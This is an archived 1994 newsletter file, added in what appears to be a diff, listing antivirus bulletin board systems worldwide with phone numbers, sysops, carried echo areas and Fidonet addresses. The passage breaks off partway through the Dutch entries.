@@ -0,0 +1,665 @@ + +CrisNews #2 - 05/01/94 + +---------------------------------------------------------------------------- +We can thank Robert for making this AV BBS list public for us all to have :) +---------------------------------------------------------------------------- + +The V.I.R.U.S./Virus Doctor BBS List + +A number of those who have access to viral information or antiviral software +only through commercial systems (or long distance calls) have requested +listings of "local" access to antiviral sources. This list is an attempt to +provide such information. Additions and corrections are solicited to help make +this a more useful reference source. + +For sorting purposes the wide variety of bracket, slash, space and hyphen +placement have been replaced with the European standard "global" area codes. +I have used hyphens instead of blank spaces when separating the "global", +"country" and "city" codes. Every phone number begins with the global area +code; this code is "1" for USA and Canada. To prevent misinterpretation, the +global area code is preceded with a "+" sign, and delimited by a hyphen. The +(national) area code is delimited from the local phone number by another +hyphen. (Thanks to Otto Stolz for his assistance.) + +In order to avoid line wrap on Fidonet mail readers, the "node number" has been +"right justified" at 75 columns. For those on the Internet, it is possible to +send mail to these systems. The node number is in the format +:/ and can be converted to an Internet address as +user.name@f.n.z.fidonet.org, so that Rob Slade may be reached +at The Cage (1:153/733, see "+1-604") as Rob.Slade@f733.n153.z1.fidonet.org. +VirNet sites can be addressed as +Fname.Lname@f.n.z.virnet.bad.se at the moment. + +Information included, where available, is name of system, name of sysop, city, +province/state/country, information carried and Fidonet address. If a product +is associated, that is included as well. 
+ +Key: + +AM = Amiga AT = Atari MC = Macintosh PC = MS-DOS +Fidonet: VIRINF = VIRUS_INFO VIR = VIRUS WRN = WARNINGS VNT = VirNet +Files archived: CVP = Computer Viral Programs column RVW = Antiviral reviews + +Where verification is possible, the "node number" is followed by a "V" and the +initials of the reviewer. + + ++1-201-3401340 The Quill & Inkpot BBS, Garfield NJ (1:2604/407) ++1-201-3852874 Menti's Bay, Dumont NJ VIR (1:107/521) ++1-201-4847265 THE DIGITAL ABYSS, Newark NJ VIR (1:2605/121.0) ++1-201-5799387 E.o.D. Systems VIRINF (1:2606/213) ++1-202-3640644 Int'l Computer Security Association (ICSA) BBS ++1-203-2281766 Starfleet Technical Support, Columbia CT (1:320/296) ++1-203-2611476 Xanth BBS, Easton CT (1:141/465) ++1-203-3842453 The Wacko Board, Fairfield CT (1:141/415) ++1-203-4498642 The Rx BBS, Groton CT VIRINF (1:320/448) ++1-203-5285831 Warrior BBS VIRINF (1:142/831.0) ++1-203-5993970 Our House VIRINF (1:320/128.0) ++1-205-4423078 Southern Nights BBS, Gadsden AL (1:373/6) ++1-205-4792327 The Intrepid BBS, Mobile AL VIR (1:3625/467.0) ++1-205-6530240 The CADD Station, Theodore AL (1:3625/459) ++1-205-7448546 Channel 8250, Birmingham AL VIRINF ++1-205-9437530 Gulf Coast Net VIRINF (1:3625/443) ++1-205-9801089 Deep Space 9 VIRINF (1:3602/45) ++1-206-2449661 Top Hat BBS WRN (1:343/40) ++1-206-4318270 The Dragon's Eye BBS VIRINF (1:343/116.116) ++1-206-5222263 SeaBIN BBS, Seattle WA VIRINF (1:343/89) ++1-206-581APPLE The right place, Tacoma WA MAC (1:138/131) ++1-206-5825579 Awakening BBS, Tacoma WA VIRINF (1:138/102) ++1-206-6721198 The French Connection, Edmonds WA (1:343/45) ++1-206-7711730 The French Connection, Edmonds WA (1:343/45) ++1-206-7757983 Pioneers BBS, Safe Hex Int'l VIRINF (1:343/54.0) ++1-206-7757983 Michael Arends P.O. 
Box 1531 Lynnwood, WA 98046-1531 ++1-206-7802011 Quicksilver, Bainbridge Is WA VIRINF (1:350/201) ++1-206-8346789 Camas Chatter Box BBS (1:105/123) ++1-206-9449634 The Open Window BBS VIRINF (1:105/130) ++1-212-2556656 City People BBS, New York NY VIR (1:278/720) ++1-212-5198042 Stargate BBS, New York NY VIR (1:278/714) ++1-212-8896438 Software Concepts Design, Ross Greenburg Flushot, VIRx ++1-214-2381805 Master Control, Dallas TX (1:124/5107) ++1-214-3937090 Central BBS, TX (8:930/21) ++1-214-4165508 Galactic Archives, Carrollton TX (1:124/8009) ++1-214-4926565 User-To-User VIR RIME (1:124/6300) ++1-214-5788774 Mega-Sys OS/2 BBS, Plano TX VIRINF (1:124/5119) ++1-214-5790886 The WySiWyG BBS VIRINF (1:124/5132) ++1-214-6693561 Flash BBS, Richardson TX (1:124/7020) ++1-214-7278028 The Desktop BBS, Allen TX VIRINF (1:124/5133.4501) ++1-214-8815919 The Quad C, Collin Cty Comm College, Plano TX (1:124/7016) ++1-215-3689662 Stingray BBS VIRINF (273/728.1) ++1-215-4265596 Klingon Bird of Prey, Robt J Ferguson VIRINF (1:273/935) ++1-215-4439434 DSC (Datamax/Satalink Connection) VIRINF (1:273/203) ++1-215-6234897 Runway BBS, Stiller Research Integrity Master ++1-215-6236203 Runway BBS, Stiller Research Integrity Master ++1-215-6236845 Runway BBS, Stiller Research Integrity Master ++1-215-8550401 The Keep BBS, Lansdale PA VIRINF (1:273/731) ++1-216-3973068 JCUPCB, John Carroll Univ VIRINF (1:157/555.0) ++1-216-6681829 The Hard Drive Cafe, Akron OH (1:157/619) ++1-216-6788336 Akron Info & Party WRN (1:157/617) ++1-216-7528134 Certus International ++1-216-9423876 Analytical Engine BBS VIRINF (1:157/554) ++1-219-2348004 Treasure Chest ML-TBBS, South Bend IN VIR (1:227/3) ++1-219-2732431 VFR S Gordon VIRINF VIR WRN NET INT (9:101/101)(1:227/190) ++1-301-8635312 The Combat Zone (1:2612/10) ++1-301-9485717 National Institute of Standards & Technology (NIST) ++1-302-7326399 Thunderbyte USA, Dagsboro DE VIRINF/VIR (1:150/520) ++1-302-8460632 Southern Cross, Delmar DE VIRINF 
(1:150/410) ++1-302-9341323 Taurus BBS, Millsboro DE VIRINF (1:150/300) ++1-302-9341959 Taurus BBS, Millsboro DE (1:150/300) ++1-303-6517745 The Eighth Dimension (1:104/118.0) ++1-303-6660304 The Circuit Board Inc, Lafayette CO (1:104/117) ++1-303-7794253 The Vault BBS, Littleton CO (1:104/332) ++1-303-9629536 Computer Security BBS VIR (1:306/30) ++1-304-4422377 Silent Death BBS ++1-304-4806083 AIS, US Treasury CSB, Kim Clancy clancy@csrc.ncsl.nist.gov ++1-304-7667842 Project Enable, the disability resource (1:279/14) ++1-305-2211571 Ramblin' Roots, Miami FL (1:135/54) ++1-305-4240465 Marquee/2 egobashe@cybernet.cse.fau.edu DPROT (1:369/83) ++1-305-9446271 The Jailhouse, North Miami FL (1:135/34) ++1-306-9228415 Computer Answers, Prince Albert SK VIRINF (1:140/74) ++1-306-9228415 Gateway to Balumnia, Prince Albert SK VIR (1:140/138) ++1-306-9563383 The Data Dump HACK Report (1:140/12) ++1-309-3876690 Zeller East, Groveland IL (1:232/43) ++1-309-6859462 Live Wire III BBS VIRINF (1:232/27) ++1-310-3202523 Trend Micro Devices Inc PC-cillin ++1-310-3704113 Long_Island RB VIR (1:102/138) ++1-310-5455146 Ursa Major BBS, Scott Robb VIR (1:102/128) ++1-310-9433115 The Flying Circus VIR (1:102/438) ++1-310-9485919 Helping Hands, Santa Fe Springs CA (1:102/433) ++1-310-9858737 Cal State Long Beach (University BBS) ++1-312-4042824 WorkStations Unlimited, Chicago IL VIRINF (1:115/404) ++1-313-4788922 CDS BBS, Livonia MI (1:120/234) ++1-313-5487979 The Treasure House BBS VIRINF (1:120/613) ++1-313-9525438 Terox BBS, Troy MI (1:120/324) ++1-313-9692974 Int'l Network Security Association (INSA) (1:120/336) ++1-313-9692974 Atlantis, Oxford MI VIRINF (1:120/336) ++1-314-4430319 Planet ><, Columbia MO (1:289/5) ++1-314-9655296 Cheswick's, St Louis MO (1:100/375) ++1-315-4464150 The Reef, Syracuse NY (1:260/338) ++1-315-8654070 PowerLine BBS, Marcy NY VIRINF (1:2609/7) ++1-316-2213276 9th & Main, Winfield KS VIRINF (1:291/21) ++1-318-2337812 Garsand Biomedical, Inc. 
VIR (1:3803/9) ++1-318-3435882 Kittens BBS1, Monroe LA VIR ++1-318-4749892 Middle Earth, Lake Charles LA (1:3807/4) ++1-319-3379878 Icarus VIRINF (1:283/657) ++1-401-3646343 The Razors Edge, Richmond RI VIRINF (1:323/401.0) ++1-403-2400807 InterLink, Calgary AB VIR (1:134/93) ++1-403-2535996 ECS Net, Calgary AB (1:134/72) ++1-403-2867545 The Messhall, Calgary AB (1:134/73) ++1-403-3279731 The Terminal BBS, Lethbridge AB VIRINF (1:358/17) ++1-403-4843954 Synectics, Edmonton AB VIRINF (1:342/72) ++1-403-6862550 Rascal BBS, Calgary AB (1:134/122) ++1-403-7439330 NMD Maximus, Fort McMurray AB (1:3402/6) ++1-403-7916937 Arsenal of Freedom-OS/2, Fort McMurray AB (1:3402/19) ++1-403-8243019 The Sailboard, Nobleford AB VIR (1:358/25) ++1-404-3250122 Engineering Services BBS, Decatur GA (1:133/405) ++1-404-4438693 SpacePort Atlanta (1:133/524.0) ++1-404-5181356 Shelter From The Storm VIRINF (1:133/115) ++1-404-8795985 Atlanta PCUG, Atlanta GA ++1-405-2480528 The Bargain BBS, Lawton OK (1:385/17.0) ++1-405-3240943 Aloha BBS VIR (1:147/47) ++1-405-3570478 Good News II Carl Wilson c_w@lawton.lonestar.org Lawton OK ++1-405-4473211 Mann's Solutions VIRINF (1:147/1033.0) ++1-405-5368616 Toyz BBS, Lawton OK VIRINF (1:385/23) ++1-405-5369582 Tech Term BBS, Lawton OK VIRINF (1:385/18) ++1-405-7825951 J & J BBS, Mangum OK VIRINF (1:385/24.0) ++1-406-2843120 PC-Montana BBS, VIRINF (1:3400/26) ++1-407-2920485 Challenger BBS VIRINF VIR (1:363/175) ++1-407-6427426 The Slipped Disk, Lantana FL (1:3638/5) ++1-407-6879355 My Cozy Kitchen BBS VIRINF (1:3609/16) ++1-407-8478990 The Noble House BBS, Kissimmee FL VIRINF (1:3633/36) ++1-408-2440813 Patricia M. 
Hoffman Virus Summary Document ++1-408-4312275 Ashton-Tate/Borland (refer from 3103242188) ++1-408-9739598 Symantec/Norton Norton AntiVirus/Norton Utilites ++1-408-9739767 Symantec BBS ++1-408-9884004 HomeBase BBS, McAfee Assoc VIRUSCAN Suite ++1-409-8234155 The Parole Board, College Station TX (1:117/369) ++1-410-5292584 SyncPoint, Baltimore MD VIRINF (1:261/1008) ++1-410-8938255 The Rainbow Zen, Fallston MD VIR (1:261/1111) ++1-410-9749305 The North Star BBS VIR (1:261/1108) ++1-412-4815302 Pittsburgh Computer Virus Specialists BBS ++1-412-6783202 Magic Board BBS, McKeesport PA (1:129/165) ++1-412-9813151 Mabel's Mansion, Sharon PA (1:2601/100) ++1-414-3778462 The Phantom Tollbooth, Cedarburg WI (1:154/410) ++1-415-3375416 The PC GFX Exchange WRN (1:125/217.0) ++1-415-3656384 Ship to Shore, SF Bay West CA VIRINF (1:204/7.0) ++1-415-4310473 SeaHunt BBS, San Francisco CA (1:125/20) ++1-415-4542893 International Microcomputer (IMSI) VirusCure Plus ++1-415-5645623 Crystal Palace, San Francisco CA (9:101/107) (1:125/53) ++1-415-8261707 Foley Hi-Tech Systems Safety Disk ++1-415-8618290 Coconino County, San Francisco CA (1:125/28) ++1-416-2535900 SMARTalec, Etobicoke ON (1:250/834) ++1-416-4919249 Access-PC BBS, Scarborough ON VIR (1:250/320) ++1-416-4985602 Ali Salari asalari@gpu.utcs.utoronto.ca (1:250/508) ++1-416-4985602 OmegaStardock (2330-0630EDT) VIRINF (1:250/508) ++1-416-532-0456 Command Software Systems F-PROT Professional ++1-416-5710279 The Barn Stormers, Oshawa ON VIR AM (1:229/114) ++1-416-5796318 Motor City BBS, Oshawa ON (1:229/430) ++1-416-6297000 Canada Remote Systems, Toronto ON ++1-416-6297044 Canada Remote Systems, Toronto ON ++1-416-6622193 Data Warehouse, Stoney Creek ON VIRINF (1:244/133) ++1-416-7690022 CompuNet, Peter Avgerinos (1:250/407) ++1-416-7693401 CompuNet, Peter Avgerinos (1:250/407) ++1-416-8207273 Forbidden Knights Systems VIRINF (1:259/423) ++1-416-8402485 Age Of The Dark Renaissance VIRINF (1:259/210) ++1-416-8402485 The Sound 
Blaster Digest Support, Brampton ON (1:259/210) ++1-416-8453224 Sheridan College, Oakville ON (1:259/303) ++1-416-8930510 Life's a Beer, Toronto ON VIRINF (1:250/410) ++1-416-9846991 InfoTech Online SuperBBS VIRINF (1:247/124) ++1-417-6240000 Inside Ok! BBS, Joplin MO VIRINF (1:286/702) ++1-501-5251681 PC Virus Research Foundation BBS ??? ++1-501-9881077 A Toad's Haven BBS, Jax AR (1:3821/5) ++1-502-4259941 TopSoft Support (1:2320/4) ++1-502-4259942 TopSoft Support (1:2320/4) ++1-503-4882251 International Computer Virus Institute Eliminator ++1-503-5917882 ATC, Aloha OR VIRINF (1:105/343) ++1-503-6205910 NWCS Online VIRINF (1:105/362) ++1-503-6235530 White Dragon BBS, Dallas OR VIRINF (1:105/630) ++1-503-6354386 Information Anxiety, Lake Oswego OR (1:105/208) ++1-503-6456275 Intel Corporation LANProtect ++1-503-6630222 Axe Tax 'N More, Gresham OR VIRINF (1:105/450) ++1-503-6831385 Sydex BBS, Eugene OR Prune Disk Utility ++1-503-7613003 Eastside Data Services #2, Portland OR (1:105/61) ++1-504-8862157 WSTPC BBS, Nolan Lee (1:390/5) ++1-505-4739765 Selective On-Line, Santa Fe NM VIR (1:15/11) ++1-506-3259002 Driftnet, Wallace Hale, Woodstock NB SIX(TH) ++1-506-8497511 Programmer's Corner, Saint John NB (1:255/6.0) ++1-506-8590687 Red Dwarf BBS, Moncton NB VIRINF (1:255/202) ++1-508-5282295 Computer Confident!, Franklin MA (1:322/594) ++1-508-8758009 MSI S/W BBS, Framingham MA (1:322/327) ++1-508-9876182 LBD Consultants, Oxford MA VIRINF (1:322/507) ++1-510-4233331 Felicia BBS, Bill Orvis (orvis@llnl.gov) RVW ++1-510-4234753 Felicia BBS, Bill Orvis (orvis@llnl.gov) RVW ++1-510-6729325 Computer Communications, Concord CA (1:161/3216) ++1-512-2594896 Far Point Station HACK (1:382/77) ++1-512-2823941 Flotom Enterprises HACK (1:382/91) ++1-512-3211324 The Rendezvous, Bastrop TX VIRINF (1:382/92) ++1-512-5763893 NRFPT BBS, Victoria TX VIR (1:3802/221.0) ++1-512-8370953 JimNet, Austin TX VIR (1:382/29) ++1-514-3273406 Simple Solutions, Montreal PQ (1:167/224) 
++1-514-3642937 Juxtaposition, Lasalle PQ (1:167/133) ++1-514-5957096 Avant 386, Lasalle PQ (1:167/190.1) ++1-514-6836729 XON/XOFF Information System, Montreal PQ (1:167/159) ++1-514-7281247 Radio-Amateur BBS, Montreal, PQ (1:167/134) ++1-514-7697546 SSSFFF, Montreal PQ (1:167/166) ++1-514-9377451 ABS International (Canada), Montreal PQ (1:167/136) ++1-516-4835841 Wizzard's Cave, Jon Freivald INT ++1-517-3938387 The Rec Room, Lansing MI (1:159/350) ++1-517-4839609 LCC CAI BBS, Lansing MI VIR (1:159/575) ++1-519-7671419 Spark-5, Guelph ON VIRINF (1:221/321) ++1-519-9721315 Dead End, Windsor ON (1:246/17) ++1-519-9739330 Windsor Download BBS VIR (1:246/15) ++1-601-4533963 MidNite ChowBoy, Greenwood MS VIRINF (1:368/1) ++1-602-7475236 Solitude BBS, Tucson AZ PC INT PC-Sentry (1:300/23) ++1-602-7906230 SouthWest Data, Tucson AZ (1:300/21) ++1-602-8414474 Artemis Lair, Phoenix AZ (1:114/116) ++1-602-9329243 Warzone, Avondale AZ VIRINF (1:114/150) ++1-602-9706901 RG Software Systems Diskwatcher/ViSpy/Virus Bulletin ++1-603-4320922 Leo Technology/NETIS PC VIRINF VIR INT (1:132/189) ++1-603-4322517 Leo Technology/NETIS PC VIRINF VIR INT (1:132/189) ++1-603-5369618 The Hobby Center, Plymouth NH PC VIRINF VIR (1:132/180) ++1-604-2612347 TheCage PC VIRINF VIR WRN VNT NET INT CVP RVW (1:153/733) Vrms ++1-604-2667754 The BandMaster, Vancouver BC VIRINF (1:153/715) ++1-604-3211646 The RedPoint BBS, Vancouver BC VIR (1:153/7060) ++1-604-3213068 Peace & Silence!, Vancouver BC (1:153/737) ++1-604-3226088 Peace & Silence!, Vancouver BC (1:153/717) ++1-604-3238417 Pasin MainFrame #3, Vancouver BC VIRINF (1:153/717) ++1-604-3652426 The Rumour Mill, Robson BC VIR (1:353/450) ++1-604-3746012 DaTaCoRp, Kamloops BC (1:353/730) ++1-604-3803055 The Wild Wild West VIRINF (1:340/62) ++1-604-4774508 The Mohave Desert VIRINF (1:340/60) ++1-604-5257715 RAVE (defunct) ++1-604-5263676 CyberStore, Vancouver BC $ AM AT MC PC Virus Doctor feed Vrms ++1-604-5331867 Bear Garden, Langley BC (1:153/920) 
++1-604-6813667 Lambda Speaks, Vancouver BC WRN (1:153/756) ++1-604-7561521 The Annex BBS, Nanaimo BC VIR (1:351/401) ++1-604-7588084 The Excaliber BBS, Nanaimo BC VIRINF (1:351/287) ++1-605-2324648 The Voyager New Space To Explore, McCook Lk SD (1:288/2) ++1-606-8439363 Metaverse BBS, Bill Lambdin VIRINF LAT ++1-607-2575822 Memory Alpha, BAKA Computers Inc, Mark Anbinder ++1-607-6873470 NiteWing (8:72/5) (1:260/410) ++1-607-7244360 Ground Zero, Conklin NY (1:260/490) ++1-607-7977508 The Satellite of Love VIRINF (1:260/485) ++1-609-6601235 The Pigeon Coop, Manahawkin NJ VIRINF (1:266/63) ++1-609-7783103 .\lternate Reality VIRINF (1:266/37) ++1-612-5713290 The Enterprise Board, Fridley MN (1:282/60) ++1-612-5716280 The Enterprise Board, Fridley MN (1:282/60) ++1-612-6869177 HomeTown BBS, Eagan MN (1:282/3002) ++1-613-2305307 C.R.I.M.E. (Chez Rob's International Mail Exchange) ++1-613-3928294 Lion's Den, Trenton ON VIR (1:249/303) ++1-613-3943268 Bull's Eye, Trenton ON VIRINF (1:249/302) ++1-613-5239816 The Street, Ottawa ON (1:243/20) ++1-613-5265975 Sarcastic Cow, Gloucester ON (1:163/273) ++1-613-5472479 Challenged-I For the Abled, Kingston ON (1:249/138) ++1-613-5675146 Midnite Mania, Ottawa ON VIRINF (1:163/313) ++1-613-6872497 Misty Mountain BBS HACK Report (1:241/7) ++1-613-7295032 War on Virus Canada BBS ++1-613-7313419 Steve Tibbett VirusX for Amiga ++1-613-7314421 Inescapable Death, Ottawa ON VIRINF (1:163/449) ++1-613-7745290 Dundas Dynamo, Laurie Summers/Paul Hutchinson (1:163/284) ++1-613-8206684 DM BBS, Ottawa ON VIRINF (1:163/542) ++1-613-8207542 DM BBS, Ottawa ON VIRINF (1:163/542) ++1-613-8259302 Tumbler's Tavern VIRINF WRN (1:163/315) ++1-613-8309262 Rez-Tek Online VIR (1:163/517) ++1-613-9921603 ISSC BBS, Ottawa ON (1:163/152) ++1-614-4426696 Utilities Exchange (1:226/60) ++1-615-3724200 Hippie Commune, Baxter TN (1:3637/2) ++1-615-4422833 White Lightning, Madisonville TN Thunderbyte (1:3643/1) ++1-615-5263347 Cumberland, Cookeville TN (1:3637/1) 
++1-617-2447053 The Beta BBS, Newton MA VIR (1:101/346) ++1-619-2774140 Alien Biker Kat VIRINF (1:202/1120) ++1-619-2810855 The Raging Main (replaces Programmer's Connection) ++1-619-2840799 The Programmers WorkShop, San Diego CA (1:202/204) Ctg ++1-619-4571836 Programmer's Paradise VIRUS-L Ctg ++1-619-5560136 CNSP/CNAP PCB (U.S. Navy BBS) ++1-619-5610058 Lion Share(ware) BBS VIRINF (1:202/1316) ++1-619-5623646 Foys' Trading Post, Santee CA VIRINF (1:202/1301) ++1-619-5886941 D.J.M.BBS VIRINF (1:202/104) ++1-619-6931575 A-1 EZ OK MC (1:202/234) ++1-619-9515456 The Back Door, Victorville CA VIRINF (1:202/1110) ++1-702-2270270 Dark Tower, Las Vegas NV (1:209/220) ++1-702-3672758 Act One BBS, Las Vegas NV (1:209/237) ++1-702-8763316 Rise of the Dragon VIRINF (1:209/233) ++1-703-3690672 OS/2@Manassas, Manassas VA (1:265/101) ++1-703-5732246 The Fido Exchange, Vienna VA (1:109/353) ++1-703-5735606 The Fido Exchange (1:109/353) ++1-703-5738990 2775-B Hartland Road, Falls Church, VA 22043 ++1-703-5738990 Norman Defense Data Systems Inc. V-Base ++1-703-7201624 End of the Line, Duane Brown VIRINF NET (1:274/16) ++1-703-7501625 Little Larry's Place, Springfield VA (1:109/3) ++1-703-7563976 BXR Info Corner, Falls Church VA (1:109/158) ++1-703-7566109 BXR Info Corner, Baileys Xroads VA VIRINF (1:109/158.0) ++1-703-8153244 Sentry Net, DStevens, Centreville VA VIRINF VIR(1:109/229) ++1-703-8988153 Burleigh's BBS, Spotsylvania VA (1:274/6) ++1-703-9632460 The XT Connection, Richlands VA VIRINF (1:3622/801) ++1-704-5681663 Carolina Forum PC AM MC (8:926/2) ++1-705-5274029 Shockwave BBS, Midland ON (1:252/404) ++1-706-5683151 Hill Side BBS (1:3613/1) ++1-706-5968126 Under The Nile, Cairo Rsrch, S Burkett, Col. 
GA(1:3613/12) ++1-706-8605070 The Public's Domain VIR (1:360/14) ++1-707-5520462 The Power Station VIRINF (1:161/123) ++1-708-8273619 Lambda Zone VIRINF (1:115/827) ++1-708-8877685 FamilyNet International Echogate (1:115/887) ++1-709-3684353 Space Odyssey, Mount Pearl NF VIRINF (1:255/202) ++1-713-2428363 Bulldozers BBS VIRINF (1:106/242) ++1-713-3341136 Uncle Wally's Place, Houston TX VIRINF (1:106/1136) ++1-713-3764767 Texas Fathers for EQUAL Rights! VIR (1:106/1555) ++1-713-4999730 Jagged Edge, Stafford TX (1:106/9730.0) ++1-713-6646019 The Breeze Rbbs, Bellaire TX (8:930/501.0) ++1-713-6978811 The Anti-Virus BBS, Houston TX ++1-713-9809671 COMM Port One, Sugar Land TX (1:106/2000) ++1-714-2559508 Colossus Galactica, Brea CA VIR (1:103/307) ++1-714-9231031 The Diamond Bar, Ontario CA (1:207/101) Ctg ++1-716-2623680 The Black Cat Information Service VIRINF (1:2613/475) ++1-716-7687973 Exit 47/LeRoy BBS, LeRoy NY WRN (1:260/220) (1:2613/810) ++1-717-2430055 L & T's Spitfire BBS (1:270/713) ++1-717-6893123 Brinkman's Hollow, Hamlin PA (1:268/324) ++1-718-7296101 The Dorsai Diplomatic Mission, Brooklyn NY (1:278/706) ++1-718-9341843 Shadowdale Telegard Alpha #2 VIR (1:278/624.0) ++1-803-4994316 Carolina Connections, Sumter SC VIRINF (1:3647/1.0) ++1-803-5245655 Broad River Emporium VIR (1:3650/3) ++1-803-5737069 The Dark Corner, Spartanburg SC VIRINF (1:3639/203) ++1-803-5737069 The Dark Corner BBS, Spartanburg SC VIRINF (1:3652/3) ++1-804-4363125 The Apex VIRINF (1:275/99) ++1-804-4831482 The File Allocation Table in VA (1:275/16) ++1-804-7373967 Greater Richmond Connection, Richmond VA VIR (1:264/177) ++1-804-8650222 Turn and Burn BBS, Hampton VA (1:271/275) ++1-805-3436018 Chthonic VIRINF (1:206/2601) ++1-805-5469150 XTree Co. 
BBS ViruSafe ++1-806-3587032 The Town Crier, Amarillo TX VIRINF (1:3816/126) ++1-808-6769420 The Joyous Occasion BBS (85:818/106) ++1-809-2694970 Ranger BBS, Bayamon PR (1:367/23) ++1-813-2393704 Bits of Blue, Tampa FL VIRINF (1:377/32) ++1-813-2867084 The Godfather BBS, Tampa FL VIRINF (1:377/54) ++1-813-3924280 Programmer's Realm II VIRINF (1:3603/280) ++1-813-5252326 *SPPE* Origin-o:just Italian Seasoning (1:3603/326) ++1-813-8494034 SHI USA East, Port Richey FL Jim Maciorowski (defunct?) ++1-813-8628850 Studio PC BBS VIR (1:3619/1) ++1-813-9616242 T.A.B.B., Tampa FL (1:377/6) ++1-813-9800228 Does Your Mother Know, Tampa FL (1:377/37) ++1-815-7531800 NIU Connection VIR (1:11/70.0) ++1-816-3224547 Solo-Quest VIR (1:280/315) ++1-816-4362843 Maple Woods, Kansas City MO (1:280/7) ++1-816-8873451 Gryphon, Harrisonville MO (1:280/69) ++1-817-2496261 CyberVille, Benbrook TX VIR (1:130/78) ++1-817-2830843 Spare Parts VIR (1:130/38) ++1-817-4733621 Nemesis VIR (1:130/61) ++1-817-5922960 Fire Point, BOCA VIR (1:3805/4) ++1-817-6905527 House Of Golem, Killeen TX 76543 (1:395/21) ++1-817-7617735 WFPD BBS VIR (1:3805/6) ++1-817-7617738 WFPD BBS VIR (1:3805/6) ++1-817-7933558 Wizard BBS, Killeen TX (1:395/8) ++1-817-8555420 Maximum Overdrive, Wichita Falls TX (1:3805/8) ++1-818-5667912 Rambo-Scan WWIV (Public BBS) ++1-818-7920419 Inter-BBS, Pasadena CA VIRINF (1:102/741.200) ++1-818-8829058 The Sweet Life PCBoard, Canoga Park CA (1:102/815) ++1-818-9857150 Los Angeles Valley College VIRINF (1:102/837) ++1-819-6859046 Multi Vision, Aylmer PQ (1:163/304) ++1-902-4535731 the Max!, Halifax NS (1:255/107) ++1-902-4548351 the Max!, Halifax NS VIRINF (1:255/107) ++1-904-3353522 The Pyramid VIRINF (1:3601/31) ++1-904-3778574 Transcom II BBS, Gainesville FL (1:3601/32) ++1-904-3868693 Wingit, Tallahassee FL ++1-904-6515241 Connection, Shalimar FL VIRINF (1:366/17) ++1-904-7292110 digital underground, eglin afb, fl VIRINF (1:366/43) ++1-904-9681881 Nuclear Wastelands VIR (1:3612/601) 
++1-906-4861836 Bytes-r-Us, Ishpeming Mi VIRINF (1:2280/1) ++1-907-4883751 T.C.'s Byte Bank System, North Pole AK (1:355/2) ++1-908-2576029 Brunswick Mart BBS, Edison NJ ++1-908-3228006 ACGNJ Main, Fanwood NJ VIRINF (1:2605/704) ++1-908-3228390 ACGNJ Main, Fanwood NJ VIRINF (1:2605/704) ++1-908-3609462 Synthesis BBS, Central NJ VIR (1:107/639) ++1-908-6329452 Expressway BBS, Edison NJ (1:107/3001) (1:107/387) ++1-908-8214533 The Maven's Roost, Kendall Park NJ VIR (1:107/390) ++1-912-2476977 Business Connection (1:3645/10) ++1-912-9298536 La Villa Strangiato VIR (1:3611/18) ++1-912-9532708 Mother's Kitchen, Centerville GA (1:3611/19) ++1-913-6481412 Foundation BBS, Overland Park KS (1:280/335) ++1-914-2250501 Wincomp Opus (1:272/29.0) ++1-914-3547499 SENY Echomail HUB, Spring Valley NY (1:272/1) ++1-914-3743903 The MailMan, NY (1:272/34) ++1-914-6776948 Bear Heaven, Walter & Debbie Bodin VIR (1:272/53) ++1-914-7626954 Implosion BBS, Millwood NY (1:272/54) ++1-914-8898379 The Link BBS VIRINF (1:272/46) ++1-914-9617032 DataShack BBS, Eastchester NY (1:272/55) ++1-916-3317318 The OtherWhen BBS, Sacremento CA VIRINF (1:203/601.0) ++1-916-3341620 KSBE Digital Radio Datamaze VIRINF (1:203/100.0) ++1-916-3448146 Silverado Express, N Highlands CA VIRINF (1:203/1102) ++1-916-7222569 Alpha & Omega (1:203/56) ++1-916-7538788 Dynasoft TimeGates VIRINF MC (1:203/955) ++1-916-9659361 The Genesis Satellite System (1:203/965) ++1-918-4921749 Morning Star BBS, Tulsa OK VIRINF (1:170/307) ++1-918-6650885 Wayne's World BBS, Tulsa OK (1:170/204) ++1-918-7452448 The Tower of London BBS (1:170/213) ++1-919-3551560 The Void BBS, Greenville NC (1:3629/415) ++1-919-4191602 Datawatch (frmrly Microcom) Virex-PC/Virex-Mac/VIRx ++1-919-7783218 Software Cache, Goldsboro NC VIRINF (1:151/811) ++27-11-4031757 Golden City Opus, Johannesburg RSA (5:7101/1) ++27-11-4122540 Rand Datasystems Technology VIR (5:7101/38.0) ++27-11-4754941 Bombed Out, Klerksdorp RSA (5:7105/6) ++27-11-4764735 NetLine-2, 
Randburg RSA (5:7101/19) ++27-11-4771225 Netline Northcliff VIR (5:7101/24.0) ++27-11-7061749 Fast! BBS, Sandton RSA (5:7101/47) ++27-11-7682435 Layout de Marillac, Johannesburg VIR VIRINF (5:7101/40) ++27-11-8171321 The Graphics BBS VIR (5:7101/56) ++27-11-8645787 DePtHs Of InSaNiTy, Alberton RSA VIR (5:7101/54) ++27-12-2212345 Novell User Group, Pretoria RSA (5:7101/22) ++27-12-6602410 Top Byte, Verwoerdburg RSA (5:7101/37) ++27-16-660955 Netline KSD, Henley-On-Klip (5:7101/6) ++27-17184102 Goldfields, Welkom (5:7105/1) ++27-18-86524 Bombed Out, Klerksdorp RSA (5:7105/6) ++27-21-242208 Information Security, Cape Town RSA (5:7102/110) ++27-21-242208 Oliver Steudler PC VIR VIRINF RVW CVP ++27-21-261101 Magnum BBS, Cape Town RSA (5:7102/111) ++27-21-5576775 Chaos Manor HACK (5:7102/713) ++27-31-7655045 Softel Monster BBS, Natal (5:7103/1.0) ++27-41-341122 The Catalyst, Sajid Rahim, Port Elizabeth RSA (5:7105/4.5) ++27-41-341122 The Catalyst BBS 1, Port Elizabeth (5:7104/1) ++27-41-342859 The Catalyst INT (catpe.alt.za) (5:7105/4.5) ++30-1-2110614 Gambler BBS, Athens Greece VIR (2:410/109) ++30-1-2927972 Noise Forest System VIR (2:410/107.1) ++30-1-3607882 Onned BBS, Athens Greece VIR (2:410/110) ++30-1-4954630 Master Mailing System, Pireaus Greece VIR (2:410/123.0) ++30-1-8050723 Metal Mutant BBS Pefki, Athens Greece VIR (2:410/114) ++30-431-72171 SHI GREECE, Konstantinos Angelis, Box 50784, Thessaloniki ++30-541-76052 The East Way, Xanthi, Greece (2:410/8.3) ++31-10-4795892 [MPwrHQ] 1st European #Cc.MisTeam VIRINF (2:512/1007.2) ++31-10-4795892 Sae[Dv]Remote, E Cleton, Rotterdam PC VIR VNT ++31-10-4862184 Maasstad BBS VNT (9:310/300) ++31-15-626535 RedBox! 
